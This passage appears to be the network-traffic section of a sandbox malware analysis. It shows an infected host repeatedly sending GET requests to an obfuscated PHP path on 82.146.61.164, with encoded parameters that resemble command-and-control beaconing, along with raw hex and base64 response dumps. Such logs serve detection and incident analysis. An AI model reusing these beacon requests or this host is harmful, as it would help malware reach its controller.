Apr 23, 2024 14:47:32.705517054 CEST	1289	IN	Data Raw: 69 69 39 67 76 51 2f 4c 67 75 31 41 4b 42 68 67 63 57 78 6c 44 50 35 49 74 31 42 39 6c 67 36 79 6e 30 34 70 38 63 59 6e 5a 30 4c 38 56 6f 41 77 4f 6c 48 50 38 71 42 54 7a 53 63 45 34 33 38 4f 42 32 79 67 7a 4a 32 67 44 38 74 50 57 44 66 49 64 6e Data Ascii: ii9gvQ/Lgu1AKBhgcWxlDP5It1B9lg6yn04p8cYnZ0L8VoAwOlHP8qBTzScE438OB2ygzJ2gD8tPWDfIdnXxyMfNCMr5A0OUMepsGQXedkFNmDGUSOAhyw5kfXMUIp3OlTAWPowKjP9HspsWqQeC8DFlgekEwfkp0MsAyXRBvmKBKxRRdFWBl35ulQ7Jw7c3U3dwCkg6IssGMcRkP4vNUKQhQIGgRtgfj4zTNbp5LrBrczLwIcA
Apr 23, 2024 14:47:32.705554962 CEST	1289	IN	Data Raw: 30 69 38 77 32 70 35 56 67 38 42 31 47 64 4c 58 4d 37 72 69 42 4d 55 36 6a 48 4a 6b 37 32 66 65 38 38 78 70 58 4c 6c 6f 33 6d 56 34 6e 79 30 77 71 37 4a 78 6b 49 6f 58 62 52 65 6f 50 31 70 50 7a 55 33 4a 51 55 41 7a 49 46 79 75 44 57 77 7a 31 47 Data Ascii: 0i8w2p5Vg8B1GdLXM7riBMU6jHJk72fe88xpXLlo3mV4ny0wq7JxkIoXbReoP1pPzU3JQUAzIFyuDWwz1GNMbwdOT+MY+hjdwf/zxVUhFBceX5XeMsY1sBkz4zUzhvBFQbo7urAP8C5UYPQMzXfYlFWD4JNlg2NvNKpShkVuXJTEz+ZdZ3LH2tbSfjlQ8SYoCt2y4X3GxnILG89X1Ggu/odoMw0QUK1sBu8EvBOV/o3+0+1ZNQw
Apr 23, 2024 14:47:32.705792904 CEST	1289	IN	Data Raw: 75 53 37 42 32 4f 58 73 39 46 6e 52 63 48 44 57 41 63 42 38 44 33 44 7a 7a 69 54 59 5a 37 53 57 6a 55 49 54 6c 73 32 73 4d 61 63 66 76 61 75 6f 33 63 69 79 46 45 62 6a 62 46 66 68 48 57 38 54 53 34 4a 57 4a 67 78 52 32 48 55 46 72 77 45 5a 6d 77 Data Ascii: uS7B2OXs9FnRcHDWAcB8D3DzziTYZ7SWjUITls2sMacfvauo3ciyFEbjbFfhHW8TS4JWJgxR2HUFrwEZmwjo5kL8RocBUbHZSiG6LrllRQNjoKm7d26X4I2UunXMWmL8dgPkzrIAsa998mCnCcLFOe58z7GXGShabKeP4Y5Lqq2GQX/b83Ul1ULkCgb+bA+4/dvDnguuE2iN9uYLwiAtBGPgBC42kDf5C5wBUNXozN81/WML4NU
Apr 23, 2024 14:47:32.705831051 CEST	1289	IN	Data Raw: 4e 35 72 52 6f 45 6c 79 30 62 48 48 78 74 44 67 54 39 39 31 4e 2b 39 78 4c 47 73 33 71 44 62 4b 2f 61 71 54 73 45 67 5a 2f 34 45 6b 65 71 2b 6a 7a 38 6b 71 79 34 57 77 61 77 31 35 59 58 56 44 63 74 6d 45 78 55 6f 6d 77 49 68 4e 6d 62 30 2f 77 70 Data Ascii: N5rRoEly0bHHxtDgT991N+9xLGs3qDbK/aqTsEgZ/4Ekeq+jz8kqy4Wwaw15YXVDctmExUomwIhNmb0/wpQK+bZh95rRotcPb2MCls97BsoWZhvVBAEd4BH7sydTcVa/mxpbkbLuTTjNch/KS2FELgpHgpm1YNzrPJVWUjtbUvWbsbDYxjZJLWuDWGWuSXoXhCFCW4c80XxaPNtD1pomwI8gosnMW0bIMK+s1jnBvywz6Poasxm
Apr 23, 2024 14:47:32.706087112 CEST	1289	IN	Data Raw: 48 75 46 2f 4e 4b 42 75 4a 78 65 46 33 61 4d 65 72 6b 68 73 42 46 2f 62 43 34 4f 73 31 6d 4d 59 69 2f 48 35 52 47 2b 47 58 62 6b 4b 50 43 5a 79 78 45 46 4d 35 42 77 4c 50 66 51 36 38 43 35 6c 45 4f 54 4f 5a 48 63 41 51 44 47 31 62 41 61 4f 41 65 Data Ascii: HuF/NKBuJxeF3aMerkhsBF/bC4Os1mMYi/H5RG+GXbkKPCZyxEFM5BwLPfQ68C5lEOTOZHcAQDG1bAaOAed3bKE6rRgszF2WDF1wHt610hN77AoM37aX4rDO+ghTV/8zw/YuVfoFRTqtGC09z6Xwaxrg2+Q+Y6opG0PgvFY/LW2twZO3KUj+kNTgtG/9Kq2R7iuDiNVQnAuN4VQrY5FQ0lrdRNPJM7POGtWZXQTcTZwS4GfIG07
Apr 23, 2024 14:47:32.941955090 CEST	1289	IN	Data Raw: 4d 69 49 49 59 31 79 76 59 33 77 54 6c 54 6b 4c 6b 38 6e 78 63 63 6f 4c 5a 46 57 5a 45 54 69 66 34 54 72 66 6d 72 78 51 4e 6b 44 63 4e 34 47 34 2f 36 4a 4b 36 56 61 35 73 4b 51 64 6a 62 65 48 4a 72 48 54 72 66 6a 2b 67 52 4d 66 33 58 67 74 41 48 Data Ascii: MiIIY1yvY3wTlTkLk8nxccoLZFWZETif4TrfmrxQNkDcN4G4/6JK6Va5sKQdjbeHJrHTrfj+gRMf3XgtAHP/yPaLJAK2mERLOEnFlZwgdjeqEZ7TPVllygPYt1zrYKvOSVHgKDDqE8jymkvZgKzTM5FHXL5EuA7tLLRdLc5xnvFxuuS/ANl0dagEDDoky9UQpu5ewly949L4unSgTTc6psGROfeFjTSNxoZVEWi6LkFMoiWlq1z
Apr 23, 2024 14:47:32.943299055 CEST	526	OUT	GET /localUniversal/3Dumpprocessor/GameWordpresstrack6/eternal4/flower8Testdump/Longpolllongpoll/Securehttpwplocal.php?ZVSxTWRKIX4WAKi9eeqlLhfkTFe6=YMPLZX6E9wpNIWg&6b216a87848e812b8911d54c09e60b83=1a5c78d0b59f0e27da6ac915b871b18e&ba66ccabe5baf5dd4d2b1b6e621d0986=gNyUTMlZGOjF2MlNGOwADM3MmNzgDOwQGMlZ2NhlTO0IWOjRTN3czN&ZVSxTWRKIX4WAKi9eeqlLhfkTFe6=YMPLZX6E9wpNIWg HTTP/1.1 Accept: / Content-Type: text/html User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0 Host: 82.146.61.164
Apr 23, 2024 14:47:33.180308104 CEST	241	IN	HTTP/1.1 200 OK Server: nginx/1.24.0 Date: Tue, 23 Apr 2024 12:47:33 GMT Content-Type: text/html Content-Length: 15793 Last-Modified: Tue, 23 Jan 2024 12:23:56 GMT Connection: keep-alive ETag: "65afafdc-3db1" Accept-Ranges: bytes

Session ID	Source IP	Source Port	Destination IP	Destination Port
3	192.168.2.5	49715	82.146.61.164	80

Timestamp	Bytes transferred	Direction	Data
Apr 23, 2024 14:47:45.528636932 CEST	646	OUT	GET /localUniversal/3Dumpprocessor/GameWordpresstrack6/eternal4/flower8Testdump/Longpolllongpoll/Securehttpwplocal.php?LysFYqMsinte=I6ADlK1LX&ca5T=9SGrVSUxhWH4wgrENNx0VJZ7p&JxuQodWZtQgCI6xIcrdPEoq9ONHdbz3=CXIhDQ&6b216a87848e812b8911d54c09e60b83=1a5c78d0b59f0e27da6ac915b871b18e&ba66ccabe5baf5dd4d2b1b6e621d0986=gNyUTMlZGOjF2MlNGOwADM3MmNzgDOwQGMlZ2NhlTO0IWOjRTN3czN&LysFYqMsinte=I6ADlK1LX&ca5T=9SGrVSUxhWH4wgrENNx0VJZ7p&JxuQodWZtQgCI6xIcrdPEoq9ONHdbz3=CXIhDQ HTTP/1.1 Accept: / Content-Type: text/html User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0 Host: 82.146.61.164 Connection: Keep-Alive
Apr 23, 2024 14:47:45.766345978 CEST	241	IN	HTTP/1.1 200 OK Server: nginx/1.24.0 Date: Tue, 23 Apr 2024 12:47:45 GMT Content-Type: text/html Content-Length: 15793 Last-Modified: Tue, 23 Jan 2024 12:23:56 GMT Connection: keep-alive ETag: "65afafdc-3db1" Accept-Ranges: bytes
Apr 23, 2024 14:47:45.766405106 CEST	1289	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 41 53 54 50 41 4e 45 4c 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 Data Ascii: <!DOCTYPE html><html><head> <title>FASTPANEL</title> <meta name="robots" content="noindex,nofollow"></head><body><div style="width:1100px;height:230px;position:absolute;left:50%;top:50%; margin-left:-550px;margin-top:-50px;text-al
Apr 23, 2024 14:47:45.766444921 CEST	1289	IN	Data Raw: 63 6d 6c 32 5a 57 52 47 63 6d 39 74 49 48 4e 30 55 6d 56 6d 4f 6d 6c 75 63 33 52 68 62 6d 4e 6c 53 55 51 39 49 6e 68 74 63 43 35 70 61 57 51 36 51 6a 45 33 51 55 49 30 4d 30 52 47 51 30 52 47 4d 54 46 46 4e 6b 46 47 4e 54 55 34 52 6b 45 79 51 6b Data Ascii: cml2ZWRGcm9tIHN0UmVmOmluc3RhbmNlSUQ9InhtcC5paWQ6QjE3QUI0M0RGQ0RGMTFFNkFGNTU4RkEyQkZDQTZGMjQiIHN0UmVmOmRvY3VtZW50SUQ9InhtcC5kaWQ6QjE3QUI0M0VGQ0RGMTFFNkFGNTU4RkEyQkZDQTZGMjQiLz4gPC9yZGY6RGVzY3JpcHRpb24+IDwvcmRmOlJERj4gPC94OnhtcG1ldGE+IDw/eHBhY2t
Apr 23, 2024 14:47:45.766480923 CEST	1289	IN	Data Raw: 55 45 32 33 45 76 6c 38 32 59 34 4a 7a 4a 46 67 37 41 66 32 69 45 35 36 4a 42 34 39 5a 46 4d 37 7a 43 34 43 4b 46 55 46 35 38 7a 39 47 36 55 4a 71 74 74 76 4d 57 77 6a 48 32 51 61 58 6c 31 68 4d 6f 47 59 59 34 44 37 37 41 76 32 68 59 52 4b 68 73 Data Ascii: UE23Evl82Y4JzJFg7Af2iE56JB49ZFM7zC4CKFUF58z9G6UJqttvMWwjH2QaXl1hMoGYY4D77Av2hYRKhsvGur3ZLQDC3h/siAOcETJ6Ip2K/58KGFgsaEu5feGRzQnU+sbGz5OwYz7JLQcG+hS7imMf7uCnztG8bp1bgp9LM/vUOb+fo61KneMfnSxFLLXyhy/O0TFiXU5fnOA4ou7numDsjHM0LvNB7Gu0twEbeM1yJ90SASE
Apr 23, 2024 14:47:45.766516924 CEST	1289	IN	Data Raw: 79 55 73 4e 79 51 6f 6b 46 42 32 74 64 61 48 46 66 76 6f 68 2b 59 33 50 77 58 73 64 39 4f 77 62 4e 73 4b 48 46 63 59 38 76 6a 6c 69 50 4a 5a 4f 79 73 31 66 4b 69 72 47 69 2b 4b 42 74 4c 56 50 71 4b 73 59 53 62 4d 59 46 76 43 70 2b 78 67 33 36 56 Data Ascii: yUsNyQokFB2tdaHFfvoh+Y3PwXsd9OwbNsKHFcY8vjliPJZOys1fKirGi+KBtLVPqKsYSbMYFvCp+xg36VVeTvH+Pt9Ctc9U0wh5TK9BKLY+llgW7oVu9Y2UGZhOphsr8+JRTmSZMeKhYZ6pdckm2679m4DKGEJ90Letb1FsbHIfBTnOx0i8Kzb8ismOF824NR2S7MA8iLmhNQHF5O0usd3ImCRBaNF/H9J4XHWIVYNfRxgbIb4
Apr 23, 2024 14:47:45.766552925 CEST	1289	IN	Data Raw: 69 69 39 67 76 51 2f 4c 67 75 31 41 4b 42 68 67 63 57 78 6c 44 50 35 49 74 31 42 39 6c 67 36 79 6e 30 34 70 38 63 59 6e 5a 30 4c 38 56 6f 41 77 4f 6c 48 50 38 71 42 54 7a 53 63 45 34 33 38 4f 42 32 79 67 7a 4a 32 67 44 38 74 50 57 44 66 49 64 6e Data Ascii: ii9gvQ/Lgu1AKBhgcWxlDP5It1B9lg6yn04p8cYnZ0L8VoAwOlHP8qBTzScE438OB2ygzJ2gD8tPWDfIdnXxyMfNCMr5A0OUMepsGQXedkFNmDGUSOAhyw5kfXMUIp3OlTAWPowKjP9HspsWqQeC8DFlgekEwfkp0MsAyXRBvmKBKxRRdFWBl35ulQ7Jw7c3U3dwCkg6IssGMcRkP4vNUKQhQIGgRtgfj4zTNbp5LrBrczLwIcA
Apr 23, 2024 14:47:45.766588926 CEST	1289	IN	Data Raw: 30 69 38 77 32 70 35 56 67 38 42 31 47 64 4c 58 4d 37 72 69 42 4d 55 36 6a 48 4a 6b 37 32 66 65 38 38 78 70 58 4c 6c 6f 33 6d 56 34 6e 79 30 77 71 37 4a 78 6b 49 6f 58 62 52 65 6f 50 31 70 50 7a 55 33 4a 51 55 41 7a 49 46 79 75 44 57 77 7a 31 47 Data Ascii: 0i8w2p5Vg8B1GdLXM7riBMU6jHJk72fe88xpXLlo3mV4ny0wq7JxkIoXbReoP1pPzU3JQUAzIFyuDWwz1GNMbwdOT+MY+hjdwf/zxVUhFBceX5XeMsY1sBkz4zUzhvBFQbo7urAP8C5UYPQMzXfYlFWD4JNlg2NvNKpShkVuXJTEz+ZdZ3LH2tbSfjlQ8SYoCt2y4X3GxnILG89X1Ggu/odoMw0QUK1sBu8EvBOV/o3+0+1ZNQw
Apr 23, 2024 14:47:45.766731977 CEST	1289	IN	Data Raw: 75 53 37 42 32 4f 58 73 39 46 6e 52 63 48 44 57 41 63 42 38 44 33 44 7a 7a 69 54 59 5a 37 53 57 6a 55 49 54 6c 73 32 73 4d 61 63 66 76 61 75 6f 33 63 69 79 46 45 62 6a 62 46 66 68 48 57 38 54 53 34 4a 57 4a 67 78 52 32 48 55 46 72 77 45 5a 6d 77 Data Ascii: uS7B2OXs9FnRcHDWAcB8D3DzziTYZ7SWjUITls2sMacfvauo3ciyFEbjbFfhHW8TS4JWJgxR2HUFrwEZmwjo5kL8RocBUbHZSiG6LrllRQNjoKm7d26X4I2UunXMWmL8dgPkzrIAsa998mCnCcLFOe58z7GXGShabKeP4Y5Lqq2GQX/b83Ul1ULkCgb+bA+4/dvDnguuE2iN9uYLwiAtBGPgBC42kDf5C5wBUNXozN81/WML4NU
Apr 23, 2024 14:47:45.766747952 CEST	1289	IN	Data Raw: 4e 35 72 52 6f 45 6c 79 30 62 48 48 78 74 44 67 54 39 39 31 4e 2b 39 78 4c 47 73 33 71 44 62 4b 2f 61 71 54 73 45 67 5a 2f 34 45 6b 65 71 2b 6a 7a 38 6b 71 79 34 57 77 61 77 31 35 59 58 56 44 63 74 6d 45 78 55 6f 6d 77 49 68 4e 6d 62 30 2f 77 70 Data Ascii: N5rRoEly0bHHxtDgT991N+9xLGs3qDbK/aqTsEgZ/4Ekeq+jz8kqy4Wwaw15YXVDctmExUomwIhNmb0/wpQK+bZh95rRotcPb2MCls97BsoWZhvVBAEd4BH7sydTcVa/mxpbkbLuTTjNch/KS2FELgpHgpm1YNzrPJVWUjtbUvWbsbDYxjZJLWuDWGWuSXoXhCFCW4c80XxaPNtD1pomwI8gosnMW0bIMK+s1jnBvywz6Poasxm
Apr 23, 2024 14:47:45.766905069 CEST	1289	IN	Data Raw: 48 75 46 2f 4e 4b 42 75 4a 78 65 46 33 61 4d 65 72 6b 68 73 42 46 2f 62 43 34 4f 73 31 6d 4d 59 69 2f 48 35 52 47 2b 47 58 62 6b 4b 50 43 5a 79 78 45 46 4d 35 42 77 4c 50 66 51 36 38 43 35 6c 45 4f 54 4f 5a 48 63 41 51 44 47 31 62 41 61 4f 41 65 Data Ascii: HuF/NKBuJxeF3aMerkhsBF/bC4Os1mMYi/H5RG+GXbkKPCZyxEFM5BwLPfQ68C5lEOTOZHcAQDG1bAaOAed3bKE6rRgszF2WDF1wHt610hN77AoM37aX4rDO+ghTV/8zw/YuVfoFRTqtGC09z6Xwaxrg2+Q+Y6opG0PgvFY/LW2twZO3KUj+kNTgtG/9Kq2R7iuDiNVQnAuN4VQrY5FQ0lrdRNPJM7POGtWZXQTcTZwS4GfIG07
Apr 23, 2024 14:47:46.003943920 CEST	1289	IN	Data Raw: 4d 69 49 49 59 31 79 76 59 33 77 54 6c 54 6b 4c 6b 38 6e 78 63 63 6f 4c 5a 46 57 5a 45 54 69 66 34 54 72 66 6d 72 78 51 4e 6b 44 63 4e 34 47 34 2f 36 4a 4b 36 56 61 35 73 4b 51 64 6a 62 65 48 4a 72 48 54 72 66 6a 2b 67 52 4d 66 33 58 67 74 41 48 Data Ascii: MiIIY1yvY3wTlTkLk8nxccoLZFWZETif4TrfmrxQNkDcN4G4/6JK6Va5sKQdjbeHJrHTrfj+gRMf3XgtAHP/yPaLJAK2mERLOEnFlZwgdjeqEZ7TPVllygPYt1zrYKvOSVHgKDDqE8jymkvZgKzTM5FHXL5EuA7tLLRdLc5xnvFxuuS/ANl0dagEDDoky9UQpu5ewly949L4unSgTTc6psGROfeFjTSNxoZVEWi6LkFMoiWlq1z
Apr 23, 2024 14:47:46.005335093 CEST	622	OUT	GET /localUniversal/3Dumpprocessor/GameWordpresstrack6/eternal4/flower8Testdump/Longpolllongpoll/Securehttpwplocal.php?LysFYqMsinte=I6ADlK1LX&ca5T=9SGrVSUxhWH4wgrENNx0VJZ7p&JxuQodWZtQgCI6xIcrdPEoq9ONHdbz3=CXIhDQ&6b216a87848e812b8911d54c09e60b83=1a5c78d0b59f0e27da6ac915b871b18e&ba66ccabe5baf5dd4d2b1b6e621d0986=gNyUTMlZGOjF2MlNGOwADM3MmNzgDOwQGMlZ2NhlTO0IWOjRTN3czN&LysFYqMsinte=I6ADlK1LX&ca5T=9SGrVSUxhWH4wgrENNx0VJZ7p&JxuQodWZtQgCI6xIcrdPEoq9ONHdbz3=CXIhDQ HTTP/1.1 Accept: / Content-Type: text/html User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0 Host: 82.146.61.164
Apr 23, 2024 14:47:46.242536068 CEST	241	IN	HTTP/1.1 200 OK Server: nginx/1.24.0 Date: Tue, 23 Apr 2024 12:47:46 GMT Content-Type: text/html Content-Length: 15793 Last-Modified: Tue, 23 Jan 2024 12:23:56 GMT Connection: keep-alive ETag: "65afafdc-3db1" Accept-Ranges: bytes

Session ID	Source IP	Source Port	Destination IP	Destination Port
4	192.168.2.5	49717	82.146.61.164	80

Timestamp	Bytes transferred	Direction	Data
Apr 23, 2024 14:47:52.920108080 CEST	565	OUT	GET /localUniversal/3Dumpprocessor/GameWordpresstrack6/eternal4/flower8Testdump/Longpolllongpoll/Securehttpwplocal.php?md25=UA&vb=r948xSj667Ud7PLnWmgd&6b216a87848e812b8911d54c09e60b83=1a5c78d0b59f0e27da6ac915b871b18e&ba66ccabe5baf5dd4d2b1b6e621d0986=gNyUTMlZGOjF2MlNGOwADM3MmNzgDOwQGMlZ2NhlTO0IWOjRTN3czN&md25=UA&vb=r948xSj667Ud7PLnWmgd HTTP/1.1 Accept: / Content-Type: text/javascript User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Host: 82.146.61.164 Connection: Keep-Alive
Apr 23, 2024 14:47:53.157114983 CEST	241	IN	HTTP/1.1 200 OK Server: nginx/1.24.0 Date: Tue, 23 Apr 2024 12:47:53 GMT Content-Type: text/html Content-Length: 15793 Last-Modified: Tue, 23 Jan 2024 12:23:56 GMT Connection: keep-alive ETag: "65afafdc-3db1" Accept-Ranges: bytes
Apr 23, 2024 14:47:53.157315969 CEST	1289	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 41 53 54 50 41 4e 45 4c 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 Data Ascii: <!DOCTYPE html><html><head> <title>FASTPANEL</title> <meta name="robots" content="noindex,nofollow"></head><body><div style="width:1100px;height:230px;position:absolute;left:50%;top:50%; margin-left:-550px;margin-top:-50px;text-al
Apr 23, 2024 14:47:53.157334089 CEST	1289	IN	Data Raw: 63 6d 6c 32 5a 57 52 47 63 6d 39 74 49 48 4e 30 55 6d 56 6d 4f 6d 6c 75 63 33 52 68 62 6d 4e 6c 53 55 51 39 49 6e 68 74 63 43 35 70 61 57 51 36 51 6a 45 33 51 55 49 30 4d 30 52 47 51 30 52 47 4d 54 46 46 4e 6b 46 47 4e 54 55 34 52 6b 45 79 51 6b Data Ascii: cml2ZWRGcm9tIHN0UmVmOmluc3RhbmNlSUQ9InhtcC5paWQ6QjE3QUI0M0RGQ0RGMTFFNkFGNTU4RkEyQkZDQTZGMjQiIHN0UmVmOmRvY3VtZW50SUQ9InhtcC5kaWQ6QjE3QUI0M0VGQ0RGMTFFNkFGNTU4RkEyQkZDQTZGMjQiLz4gPC9yZGY6RGVzY3JpcHRpb24+IDwvcmRmOlJERj4gPC94OnhtcG1ldGE+IDw/eHBhY2t
Apr 23, 2024 14:47:53.157440901 CEST	1289	IN	Data Raw: 55 45 32 33 45 76 6c 38 32 59 34 4a 7a 4a 46 67 37 41 66 32 69 45 35 36 4a 42 34 39 5a 46 4d 37 7a 43 34 43 4b 46 55 46 35 38 7a 39 47 36 55 4a 71 74 74 76 4d 57 77 6a 48 32 51 61 58 6c 31 68 4d 6f 47 59 59 34 44 37 37 41 76 32 68 59 52 4b 68 73 Data Ascii: UE23Evl82Y4JzJFg7Af2iE56JB49ZFM7zC4CKFUF58z9G6UJqttvMWwjH2QaXl1hMoGYY4D77Av2hYRKhsvGur3ZLQDC3h/siAOcETJ6Ip2K/58KGFgsaEu5feGRzQnU+sbGz5OwYz7JLQcG+hS7imMf7uCnztG8bp1bgp9LM/vUOb+fo61KneMfnSxFLLXyhy/O0TFiXU5fnOA4ou7numDsjHM0LvNB7Gu0twEbeM1yJ90SASE
Apr 23, 2024 14:47:53.157459021 CEST	1289	IN	Data Raw: 79 55 73 4e 79 51 6f 6b 46 42 32 74 64 61 48 46 66 76 6f 68 2b 59 33 50 77 58 73 64 39 4f 77 62 4e 73 4b 48 46 63 59 38 76 6a 6c 69 50 4a 5a 4f 79 73 31 66 4b 69 72 47 69 2b 4b 42 74 4c 56 50 71 4b 73 59 53 62 4d 59 46 76 43 70 2b 78 67 33 36 56 Data Ascii: yUsNyQokFB2tdaHFfvoh+Y3PwXsd9OwbNsKHFcY8vjliPJZOys1fKirGi+KBtLVPqKsYSbMYFvCp+xg36VVeTvH+Pt9Ctc9U0wh5TK9BKLY+llgW7oVu9Y2UGZhOphsr8+JRTmSZMeKhYZ6pdckm2679m4DKGEJ90Letb1FsbHIfBTnOx0i8Kzb8ismOF824NR2S7MA8iLmhNQHF5O0usd3ImCRBaNF/H9J4XHWIVYNfRxgbIb4
Apr 23, 2024 14:47:53.157672882 CEST	1289	IN	Data Raw: 69 69 39 67 76 51 2f 4c 67 75 31 41 4b 42 68 67 63 57 78 6c 44 50 35 49 74 31 42 39 6c 67 36 79 6e 30 34 70 38 63 59 6e 5a 30 4c 38 56 6f 41 77 4f 6c 48 50 38 71 42 54 7a 53 63 45 34 33 38 4f 42 32 79 67 7a 4a 32 67 44 38 74 50 57 44 66 49 64 6e Data Ascii: ii9gvQ/Lgu1AKBhgcWxlDP5It1B9lg6yn04p8cYnZ0L8VoAwOlHP8qBTzScE438OB2ygzJ2gD8tPWDfIdnXxyMfNCMr5A0OUMepsGQXedkFNmDGUSOAhyw5kfXMUIp3OlTAWPowKjP9HspsWqQeC8DFlgekEwfkp0MsAyXRBvmKBKxRRdFWBl35ulQ7Jw7c3U3dwCkg6IssGMcRkP4vNUKQhQIGgRtgfj4zTNbp5LrBrczLwIcA
Apr 23, 2024 14:47:53.157690048 CEST	1289	IN	Data Raw: 30 69 38 77 32 70 35 56 67 38 42 31 47 64 4c 58 4d 37 72 69 42 4d 55 36 6a 48 4a 6b 37 32 66 65 38 38 78 70 58 4c 6c 6f 33 6d 56 34 6e 79 30 77 71 37 4a 78 6b 49 6f 58 62 52 65 6f 50 31 70 50 7a 55 33 4a 51 55 41 7a 49 46 79 75 44 57 77 7a 31 47 Data Ascii: 0i8w2p5Vg8B1GdLXM7riBMU6jHJk72fe88xpXLlo3mV4ny0wq7JxkIoXbReoP1pPzU3JQUAzIFyuDWwz1GNMbwdOT+MY+hjdwf/zxVUhFBceX5XeMsY1sBkz4zUzhvBFQbo7urAP8C5UYPQMzXfYlFWD4JNlg2NvNKpShkVuXJTEz+ZdZ3LH2tbSfjlQ8SYoCt2y4X3GxnILG89X1Ggu/odoMw0QUK1sBu8EvBOV/o3+0+1ZNQw
Apr 23, 2024 14:47:53.157876968 CEST	1289	IN	Data Raw: 75 53 37 42 32 4f 58 73 39 46 6e 52 63 48 44 57 41 63 42 38 44 33 44 7a 7a 69 54 59 5a 37 53 57 6a 55 49 54 6c 73 32 73 4d 61 63 66 76 61 75 6f 33 63 69 79 46 45 62 6a 62 46 66 68 48 57 38 54 53 34 4a 57 4a 67 78 52 32 48 55 46 72 77 45 5a 6d 77 Data Ascii: uS7B2OXs9FnRcHDWAcB8D3DzziTYZ7SWjUITls2sMacfvauo3ciyFEbjbFfhHW8TS4JWJgxR2HUFrwEZmwjo5kL8RocBUbHZSiG6LrllRQNjoKm7d26X4I2UunXMWmL8dgPkzrIAsa998mCnCcLFOe58z7GXGShabKeP4Y5Lqq2GQX/b83Ul1ULkCgb+bA+4/dvDnguuE2iN9uYLwiAtBGPgBC42kDf5C5wBUNXozN81/WML4NU
Apr 23, 2024 14:47:53.157893896 CEST	1289	IN	Data Raw: 4e 35 72 52 6f 45 6c 79 30 62 48 48 78 74 44 67 54 39 39 31 4e 2b 39 78 4c 47 73 33 71 44 62 4b 2f 61 71 54 73 45 67 5a 2f 34 45 6b 65 71 2b 6a 7a 38 6b 71 79 34 57 77 61 77 31 35 59 58 56 44 63 74 6d 45 78 55 6f 6d 77 49 68 4e 6d 62 30 2f 77 70 Data Ascii: N5rRoEly0bHHxtDgT991N+9xLGs3qDbK/aqTsEgZ/4Ekeq+jz8kqy4Wwaw15YXVDctmExUomwIhNmb0/wpQK+bZh95rRotcPb2MCls97BsoWZhvVBAEd4BH7sydTcVa/mxpbkbLuTTjNch/KS2FELgpHgpm1YNzrPJVWUjtbUvWbsbDYxjZJLWuDWGWuSXoXhCFCW4c80XxaPNtD1pomwI8gosnMW0bIMK+s1jnBvywz6Poasxm
Apr 23, 2024 14:47:53.158083916 CEST	1289	IN	Data Raw: 48 75 46 2f 4e 4b 42 75 4a 78 65 46 33 61 4d 65 72 6b 68 73 42 46 2f 62 43 34 4f 73 31 6d 4d 59 69 2f 48 35 52 47 2b 47 58 62 6b 4b 50 43 5a 79 78 45 46 4d 35 42 77 4c 50 66 51 36 38 43 35 6c 45 4f 54 4f 5a 48 63 41 51 44 47 31 62 41 61 4f 41 65 Data Ascii: HuF/NKBuJxeF3aMerkhsBF/bC4Os1mMYi/H5RG+GXbkKPCZyxEFM5BwLPfQ68C5lEOTOZHcAQDG1bAaOAed3bKE6rRgszF2WDF1wHt610hN77AoM37aX4rDO+ghTV/8zw/YuVfoFRTqtGC09z6Xwaxrg2+Q+Y6opG0PgvFY/LW2twZO3KUj+kNTgtG/9Kq2R7iuDiNVQnAuN4VQrY5FQ0lrdRNPJM7POGtWZXQTcTZwS4GfIG07
Apr 23, 2024 14:47:53.394687891 CEST	1289	IN	Data Raw: 4d 69 49 49 59 31 79 76 59 33 77 54 6c 54 6b 4c 6b 38 6e 78 63 63 6f 4c 5a 46 57 5a 45 54 69 66 34 54 72 66 6d 72 78 51 4e 6b 44 63 4e 34 47 34 2f 36 4a 4b 36 56 61 35 73 4b 51 64 6a 62 65 48 4a 72 48 54 72 66 6a 2b 67 52 4d 66 33 58 67 74 41 48 Data Ascii: MiIIY1yvY3wTlTkLk8nxccoLZFWZETif4TrfmrxQNkDcN4G4/6JK6Va5sKQdjbeHJrHTrfj+gRMf3XgtAHP/yPaLJAK2mERLOEnFlZwgdjeqEZ7TPVllygPYt1zrYKvOSVHgKDDqE8jymkvZgKzTM5FHXL5EuA7tLLRdLc5xnvFxuuS/ANl0dagEDDoky9UQpu5ewly949L4unSgTTc6psGROfeFjTSNxoZVEWi6LkFMoiWlq1z
Apr 23, 2024 14:47:53.396239042 CEST	541	OUT	GET /localUniversal/3Dumpprocessor/GameWordpresstrack6/eternal4/flower8Testdump/Longpolllongpoll/Securehttpwplocal.php?md25=UA&vb=r948xSj667Ud7PLnWmgd&6b216a87848e812b8911d54c09e60b83=1a5c78d0b59f0e27da6ac915b871b18e&ba66ccabe5baf5dd4d2b1b6e621d0986=gNyUTMlZGOjF2MlNGOwADM3MmNzgDOwQGMlZ2NhlTO0IWOjRTN3czN&md25=UA&vb=r948xSj667Ud7PLnWmgd HTTP/1.1 Accept: / Content-Type: text/javascript User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Host: 82.146.61.164
Apr 23, 2024 14:47:53.633371115 CEST	241	IN	HTTP/1.1 200 OK Server: nginx/1.24.0 Date: Tue, 23 Apr 2024 12:47:53 GMT Content-Type: text/html Content-Length: 15793 Last-Modified: Tue, 23 Jan 2024 12:23:56 GMT Connection: keep-alive ETag: "65afafdc-3db1" Accept-Ranges: bytes

Session ID	Source IP	Source Port	Destination IP	Destination Port
5	192.168.2.5	49718	82.146.61.164	80

Timestamp	Bytes transferred	Direction	Data
